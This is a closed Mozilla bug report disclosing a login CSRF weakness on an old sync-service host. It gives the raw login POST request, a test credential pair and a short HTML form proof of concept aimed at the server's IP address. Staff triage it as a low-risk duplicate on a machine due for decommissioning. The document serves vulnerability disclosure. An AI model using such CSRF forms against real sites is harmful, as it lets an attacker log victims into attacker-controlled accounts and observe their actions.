Closed Bug 1116791 Opened 9 years ago Closed 9 years ago

CSRF vulnerability in accounts.services.mozilla.com

Categories

(mozilla.org Graveyard :: Server Operations, task)

Product:
mozilla.org Graveyard
Component:
Server Operations
Platform:
x86_64
Linux
Type:
task
Priority:
Not set
Severity:
normal

Tracking

(Not tracked)

Status:
RESOLVED DUPLICATE of bug 772818

People

(Reporter: lalithr95, Unassigned)

Details

User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
Build ID: 20140410211200

Steps to reproduce:

CSRF vulnerability in mozilla 

URL  : https://63.245.217.128/

The Login request doesnot  have valid protection against CSRF attacks .
Here is the request 

POST / HTTP/1.1
Host: 63.245.217.128
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://63.245.217.128/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

username=abhijeth0423%40gmail.com&password=testadmin

CSRF POC :
<html>

  <body>
    <form action="https://63.245.217.128/" method="POST">
      <input type="hidden" name="username" value="abhijeth0423&#64;gmail&#46;com" />
      <input type="hidden" name="password" value="testadmin" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>



Actual results:

Using above vulnerability an attacker can make victim to login into some test account and the observing the changes or actions made by the victim . This is prevented by using either an authenticated token or CSRF token .


Expected results:

The Login form need to be protected with an authentication token as one of the paramters in the Login form . This will prevent CSRF vulnerability .
Assignee: nobody → server-ops
Component: General → Server Operations
Product: Core → mozilla.org
QA Contact: shyam
Version: 28 Branch → other
Please add sec-bounty flag ! 

Regards
As best I can tell this is the old sync service, and signing in with a test account on the web won't do anything in terms of actually syncing anything behaviour-wise. I also see an SSL cert warning if I use the instructions as written, because the IP address doesn't match the cert. Going to https://services.mozilla.com/ doesn't show the same page as ignoring the cert warning. In other words, I'm not sure there's anything to be worried about here.

Richard, can you clarify some more?
Flags: needinfo?(rnewman)
Yeah, that machine is account01.phx.services.mozilla.com, which will be decommissioned soon. And this is a dupe.
Status: UNCONFIRMED → RESOLVED
Closed: 9 years ago
Flags: needinfo?(rnewman)
Resolution: --- → DUPLICATE
Summary: CSRF vulnerability in mozilla subd-domain → CSRF vulnerability in accounts.services.mozilla.com
Product: mozilla.org → mozilla.org Graveyard
Group: core-security
You need to log in before you can comment on or make changes to this bug.